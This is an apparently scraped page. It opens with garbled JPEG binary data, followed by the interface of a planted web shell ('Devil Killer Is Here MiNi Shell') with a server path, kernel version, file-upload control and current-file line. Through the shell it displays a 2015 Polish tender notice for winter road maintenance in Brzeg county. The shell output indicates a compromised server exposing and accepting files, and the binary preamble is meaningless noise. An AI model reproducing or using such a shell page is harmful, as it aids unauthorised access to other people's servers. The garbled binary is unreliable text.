JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151009/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151009/268398-N-2015.html

<p class="kh_header"><b>Brzeg: USŁUGI ZWIĄZANE Z ZIMOWYM UTRZYMANIEM DRÓG POWIATOWYCH W SEZONIE ZIMOWYM 2015/2016</b><br>
<b>Numer ogłoszenia: 268398 - 2015; data zamieszczenia: 09.10.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych w Brzegu , ul. Wyszyńskiego 23, 49-300 Brzeg, woj. opolskie, tel. 077 4113840, faks 077 4113845.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.zdpbrzeg.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> USŁUGI ZWIĄZANE Z ZIMOWYM UTRZYMANIEM DRÓG POWIATOWYCH W SEZONIE ZIMOWYM 2015/2016.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi związane z zimowym utrzymaniem dróg       
       powiatowych. Realizowane  będą na terenie gmin: miasto Brzeg, gmina Skarbimierz  
       Gmina Lubsza, Gmina Olszanka,   Gmina i Miasto Grodków, Miasto i Gmina Lewin    
       Brzeski  polegające na zwalczaniu śliskości zimowej w technologii posypywania dróg 
       mieszanką piaskowo-solną, odśnieżaniu dróg oraz załadunku i pryzmowaniu materiału.    
       Usługi będą realizowane przy   użyciu następujących środków  sprzętowo-transportowych :
       - nośniki wyposażone w urządzenia systemu monitorująco -kontrolującego - 5 szt 
       - piaskarko-solarki - 5 szt ,  w tym 2 szt nowe,
       - pługi  średnie, ciężkie - 7 szt , w tym 4 pługi dociskowe hydrauliczne,  
       - nośniki do pługów wyposażone w urządzenia systemu monitorująco- kontrolującego
          - 2 szt
       - ładowarka do odśnieżania - 1 szt
       - równiarka samojezdna do odśnieżania  - 1 szt.
   1.Drogi objęte zamówieniem winny być utrzymywane przez cały sezon zimowy      
               2015/2016 wg trzech kolejności i standardów odśnieżania i zwalczania śliskości    
               opracowanych przez Zamawiającego i stanowiące załączniki do siwz. 
               Zakres usług (ilość) podana w formularzu cenowym została określona na podstawie 
               przewidywanych potrzeb w okresie sezonu 2015/2016 zimowego utrzymania dróg.
               Ilości te mają charakter orientacyjny i posłużą do ustalenia cen złożonych  ofert, 
               a w przypadku wyboru najkorzystniejszej oferty do określenia orientacyjnej wartości   
               umowy i mogą ulec zwiększeniu lub zmniejszeniu.
               Zakres do wykonania usług będzie regulowany przez Zamawiającego stosownie do    
               potrzeb uzależnionych od warunków atmosferycznych i sytuacji w terenie.
     2.Zlecanie wykonania usług  podwykonawcom
               1)Zamawiający dopuszcza udział podwykonawców.
               2)Wykonawca może powierzyć wykonanie  zamówienia podwykonawcy.
                  W takim przypadku, Wykonawca będzie zobowiązany do wskazania w ofercie,
                  podwykonawców, lub podania przez  wykonawcę nazw (firm)podwykonawców, na 
                  których zasoby wykonawca powołuje   się określonych w art.26 ust.2b, w celu 
                  wykazania spełniania warunków udziału postępowaniu, których mowa 
                  w art.22 ust.1.
     3)Jeżeli w trakcie realizacji zamówienia nastąpi zmiana albo rezygnacja
        podwykonawcy, na którego zasoby wykonawca powołał się, na zasadach określonych
        w art. 26 ust. 2b Prawa zamówień publicznych, w celu wykazania spełnienia
                    warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 Prawa zamówień  
                    publicznych, Wykonawca jest zobowiązany wykazać Zamawiającemu, iż 
                    proponowany inny podwykonawca lub wykonawca samodzielnie spełnia je w stopniu 
                    nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.
        W trakcie realizacji przedmiotu zamówienia zmiana w zakresie podwykonawstwa
        może nastąpić tylko za zgodą Zamawiającego. W przypadku zmiany podwykonawcy
        Wykonawca będzie każdorazowo zobowiązany do zgłoszenia tego faktu na piśmie ze
         wskazaniem nazw (firmy) i adresu nowego podwykonawcy oraz części zamówienia
         mu powierzonej.
         W przypadku powierzenia realizacji przedmiotu zamówienia podwykonawcy,
         Wykonawca ponosi odpowiedzialność za działania podwykonawcy jak za własne.              
       3.Obowiązki i zadania Wykonawcy.   
                3.1.Wykonawca przez cały okres ważności umowy gwarantuje oddanie do 
                            dyspozycji  Zamawiającego w celu wykonania usług zimowego utrzymania  
                            dróg  ilość środków  sprzętowo-transportowych zgodną z ilością  
                            zadeklarowaną w ofercie. Wykonawca winien  przez cały okres zimowy   
                            utrzymywać sprzęt w stanie sprawnym poprzez  wykonywanie napraw i obsług   
                            technicznych. Koszty napraw i obsług technicznych ponosi Wykonawca
                            i wchodzą one w cenę jednostkową podaną w formularzu cenowym 
                            i w ofercie. 
               3.2.Wykonawca wyposaży na swój koszt  w ramach umowy na wykonanie   
                            usługi zimowego utrzymania dróg powiatowych  jednostki sprzętowe 
                            w system monitorująco-kontrolujący pracy sprzętu. System  
                            monitorowania pracy sprzętu przy zimowym  utrzymaniu dróg 
                            powiatowych na terenie powiatu brzeskiego powinien umożliwiać  odczyt 
                            i analizę danych w zakresie lokalizacji pojazdu, rodzaju wykonywanej 
                            pracy z prędkością z jaką porusza się pojazd. Odczyt  powinien  odbywać  
                            się czasie rzeczywistym przez przeglądarkę internetową. System powinien 
                           umożliwić  bezpośredni kontakt dyżurnego z operatorem.  Wykonawca 
                           zobowiązany do przeszkolenia wyznaczonych pracowników  Zarządu Dróg   
                           Powiatowych w Brzegu do prowadzenia akcji zimowego  utrzymania dróg  
                           w celu pełnego wykorzystania  oprogramowania systemu .
                           W razie utraty zasięgu system powinien zapewniać gromadzenie danych     
                           przez min. 5 godz. Po powrocie zasięgu urządzenie powinno natychmiast  
                           nawiązać połączenie z serwerem i przesłać zaległe dane. 
                           W przypadku  awarii systemu- czas reakcji i czas naprawy nie dłuższy niż 
                           24  godziny.
               3.3.Dla obsługi terenu gmin : miasto Brzeg, Skarbimierz, Lubsza i Olszanka 
                           Wykonawca musi mieć do dyspozycji plac przygotowany do składowania  
                            materiału stosowanego do zwalczania śliskości zimowej  (mieszanka             
                            piaskowo-solna) na terenie bazy m. Brzeg.
                            Zamawiający dostarczy Wykonawcy ilość materiałów niezbędną 
                            do prawidłowego przebiegu akcji  zimowej.
              3.4.Dla obsługi terenu gmin : Grodków i Lewin Brzeski Wykonawca musi mieć  
                           do  dyspozycji plac przygotowany do składowania materiału stosowanego 
                           do zwalczania śliskości zimowej (mieszanka piaskowo-solna) na terenie    
                           gminy  Grodków.
                           Zamawiający dostarczy Wykonawcy ilość materiałów niezbędną 
                           do prawidłowego przebiegu akcji zimowej.
               3.5.Wykonawca oddaje do dyspozycji Zamawiającemu w celu wykonania usług  
                            związanych z zimowym utrzymaniem dróg środki sprzętowo-transportowe   
                            wraz  z operatorem (kierowcą)posiadającym kwalifikacje gwarantujące  
                            prawidłowe wykonanie usług.   
                            Wykonawca zobowiązany jest do podstawienia środków sprzętowo-  
                            transportowych z materiałami pędnymi i mieszanką piaskowo-solną wraz
                            z obsługą wyposażoną w odzież ochronną zimową i posiłki regeneracyjne 
                            w miejscu określonym przez  Zamawiającego nie później niż 0,5 godz. 
                            lub w czasie nie  dłuższym 1 godz. - zgodnie ze złożoną z ofertą  od 
                            otrzymania wezwania.
                3.6.Wykonawca zabezpiecza podwójną obsadę kierowców i maszynistów   
                             gwarantującą  całodobową pracę. Ilość godzin pracy (praca, dyżur) jednej 
                             osoby-maksimum 12 godzin na dobę.         
                3.7.Wezwanie może być pisemne, ustne lub telefoniczne. Wykonawca 
                             w przypadku nasilenia niekorzystnych warunków atmosferycznych 
                             realizować będzie usługi przez 24 godziny na dobę, a jest zobowiązany 
                             zapewnić łączność telefoniczną z operatorem  (kierowcą).
                3.8.Wykonawca zabezpieczy odpowiednie pomieszczenia socjalne dla dyżurnych,  
                             Kierowców i operatorów środków sprzętowo-transportowych wezwanych
                             do realizacji usług (w tym dyżurów) związanych z zimowym utrzymaniem                    
                             dróg oraz przeprowadzi szkolenie  dla operatorów i kierowców środków  
                             sprzętowo-transportowych w zakresie techniki obsługi  mechanizmów  
                             jednostek sprzętowych i transportowych przy zimowym utrzymaniu dróg  
                             oraz BHP.
                3.9.Wykonawca zapewni realizację usług poprzez wyznaczenie dwóch  osób      
                             pełniących funkcję koordynatora pracy nośników i  sprzętu  odpowiedzialnej  
                             za prawidłowe  prowadzenie robót zimowego utrzymania dróg objętych 
                             niniejszym zamówieniem.
               3.10.Do obowiązków osoby odpowiedzialnej za ZUD z ramienia Wykonawcy                    
                             należy:
                             a/ zapewnienie podstawienia i rozpoczęcia pracy sprzętu w ciągu 0,5 godz. 
                                 lub  1 godz. - zgodnie ze złożoną z ofertą od wezwania przez   
                                 Zamawiającego,
                             b/ kontrola pracy sprzętu i nośników,
                             c/ w przypadku awarii sprzętu podstawienie zastępczego sprzętu 
                                 z zamontowanymi urządzeniami technicznymi o takich samych parametrach               
                                 technicznych i ilością zadeklarowaną w umowie,
                             d/ uzgadniania z Zamawiającym zmian lub przerw w pracy przy robotach  
                                 zimowego utrzymania,
                             e/ opracowania i uzgodnienia z Zamawiającym; harmonogramu pracy sprzętu
                                 i   samochodów z podaniem typu samochodu lub sprzętu, nr rejestracyjny  
                                 samochodu,  nazwisko kierowcy i adres i nr telefonu zainstalowanego 
                                 na  samochodzie,
                             f) rozliczanie finansowe wynajętego sprzętu i nośników.       
               3.11.Wykonawca będzie wystawiać faktury raz w miesiącu za usługi wykonane 
                              przy  odśnieżaniu i zwalczaniu   śliskości na drogach powiatowych w terminie
                              do 30 każdego miesiąca. 
               3.12.Usługa będzie zamawiana  sukcesywnie  do wysokości   środków 
                             finansowych posiadanych przez Zarząd Dróg Powiatowych w Brzegu.  
      4.Obowiązki Zamawiającego.
               4.1.W przypadku wystąpienia potrzeby Zamawiający przeprowadzi szkolenie dla 
                            operatorów i kierowców środków sprzętowo-transportowych w zakresie               
                            realizacji usług związanych z zimowym utrzymaniem dróg.
                            Ze strony Zamawiającego do wezwania Wykonawcy do podstawienia środków    
                            sprzętowo-transportowych upoważniony jest Kierownik Zarządu Dróg 
                            Powiatowych, Z-ca Kierownika  i Dyżurny Zarządu Dróg Powiatowych.
               4.2.Usługa będzie kontrolowana przez Kierownika Zarządu Dróg Powiatowych,
                            Zastępcę  Kierownika Zarządu Dróg Powiatowych i Dyżurnego Zarządu Dróg            
                            Powiatowych.
               4.3.Kontrola będzie przeprowadzana na bieżąco poprzez ocenę stanu przejezdności                         
                            dróg. 
                            Zamawiający nie odbierze i nie zapłaci za wadliwe, źle wykonane zlecenie.
               4.4.Ilość godzin pracy dyżuru jednostek sprzętowo-transportowych przy  
                            wykonywaniu   usług związanych z zimowym utrzymaniem dróg oraz ilości  
                            wysypanego na drogę materiału będą potwierdzane przez Dyżurnego Zarządu 
                            Dróg Powiatowych na kartach pracy sprzętu(raportach).
                            Oryginały dokumentów potwierdzających  ilość godzin pracy i dyżurów wraz
                            z dokumentem potwierdzającym  rozchód soli drogowej i piasku przy realizacji                   
                            usług stanowić będą podstawę do wystawienia faktury.
               4.5.Zamawiający wypłaci Wykonawcy należne kwoty w terminie 30 dni od daty      
                           otrzymania faktury.  
               4.6.Wynagrodzenie ustala się według cen jednostkowych  za 1 godz. pracy sprzętu 
                            i dyżur. 
                            Ceny podane w formularzu cenowym i w ofercie nie ulegną zmianie w trakcie  
                            realizacji zamówienia..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) warunek zostanie uznany za spełniony, gdy wykonawca (lub partnerzy 
                             konsorcjum  łącznie) wykaże, że  posiada doświadczenie polegające 
                             na wykonaniu w okresie ostatnich  3 lat  ( 3 sezonów zimowych - 2012/2013,
                             2013/2014, 2014/2015),przed upływem terminu składania ofert, a jeżeli okres 
                             prowadzenia działalności jest krótszy - w tym okresie  1 usługę z zakresu  
                             zimowego utrzymania dróg o łącznej wartości co najmniej 200 000,00 zł   
                             brutto, (słownie: dwieście tysięcy złotych 00/100),
                         2) jeżeli wykonawca będzie wykazywał  poleganie na wiedzy i doświadczeniu 
                             innego podmiotu z art.26 ust.2b - to musi wykazać wykonanie usług
                             jak  wyżej Wykonawca w takiej sytuacji zobowiązany 
                             jest przedstawić pisemne zobowiązanie tego podmiotu  do udostępnienia            
                             wiedzy i doświadczenia na okres wykonywania zamówienia, na zasadzie   
                             spełnia ,nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie uznany za spełniony, gdy wykonawca (lub partnerzy                                    
                         konsorcjum łącznie) wykaże, że dysponuje lub będzie dysponował niżej 
                         wymienionymi w pełni sprawnymi jednostkami sprzętu i środkami transportu 
                         zapewniającymi  wykonywanie  zamówienia :         
                         - nośniki wyposażone w urządzenia systemu monitorująco - kontrolującego 
                            - 5 szt 
                         - piaskarko-solarki - 5 szt ,  w tym 2 szt nowe ,
                         - pługi  średnie, ciężkie - 7 szt , w tym 4 pługi dociskowe hydrauliczne,  
                         - nośniki do pługów wyposażone w urządzenia systemu monitorująco -
                           kontrolującego - 2 szt
                         - ładowarka do odśnieżania - 1 szt  
                         - równiarka samojezdna do odśnieżania    - 1 szt
             - dysponuje lub będzie dysponował 2 (dwoma)  placami magazynowymi: 
                jeden na terenie gminy Brzeg,  drugi na terenie gminy Grodków lub posiada 
                pisemne zobowiązanie innego podmiotu do udostępnienia ww. jednostek 
                sprzętu , placu  na okres korzystania z nich przy wykonywaniu zamówienia 
                na zasadzie spełnia,nie spełnia,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie uznany za spełniony, gdy Wykonawca wykaże, że dysponuje
                  lub będzie dysponował  odpowiednio wykwalifikowanymi i doświadczonymi 
                  pracownikami - wykonawca ma do dyspozycji pracowników posiadających 
                  niezbędne doświadczenie w zakresie zimowego utrzymania dróg, którzy    
                  pracowali minimum w 2 ostatnich sezonach zimowych 2013/14, 2014/15)
                  wymagane jest 2 koordynatorów z min. średnim wykształceniem
                  oraz podwójna obsada kierowców, operatorów do obsługi i pracy sprzętu 
                  podanego w § 5.3.2 siwz  lub posiada pisemne zobowiązanie innego podmiotu 
                  do udostępnienia ww. osób na okres korzystania z nich przy wykonywaniu 
                  zamówienia na zasadzie  spełnia,nie spełnia,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) warunek zostanie uznany za spełniony, gdy Wykonawca wykaże, że znajduje 
                             się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie 
                             zamówienia przez przedłożenie informacji banku lub  spółdzielczej kasy
                             oszczędnościowo-kredytowej , w których Wykonawca posiada rachunek, 
                             potwierdzającej wysokość posiadanych środków finansowych lub zdolność
                             kredytową Wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed
                             upływem terminu składania ofert  minimum posiadanych środków 
                             finansowych lub zdolność kredytową w wysokości  200 000,00 PLN,
                             (dwieście  tysięcy złotych)na zasadzie spełnia /nie spełnia,
                         2) jeżeli wykonawca polega na zdolności finansowej innego podmiotu
                             na zasadzie podanej w art.26 ust.2b ustawy Pzp należy przedłożyć 
                             informację, której mowa w § 5.3.4. pkt.1 siwz dotyczącej tego podmiotu, 
                             na zasadzie spełnia, nie spełnia,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) OFERTA- wg załączonego wzoru do wypełnienia - zał. nr 1,
             2) FORMULARZ CENOWY  - wg załączonego wzoru do wypełnienia- zał. nr 2,
    3) zaakceptowany WZÓR  UMOWY - zał. nr 3, 
    4) druk dot. podwykonawstwa - zał. nr 10, 
             5) pełnomocnictwo do podpisywania oferty , reprezentacji o ile prawo do podpisywania, 
                 reprezentacji nie wynika z innych dokumentów,</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 98</li>
<li>2 - termin podjęcia usługi - 2</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
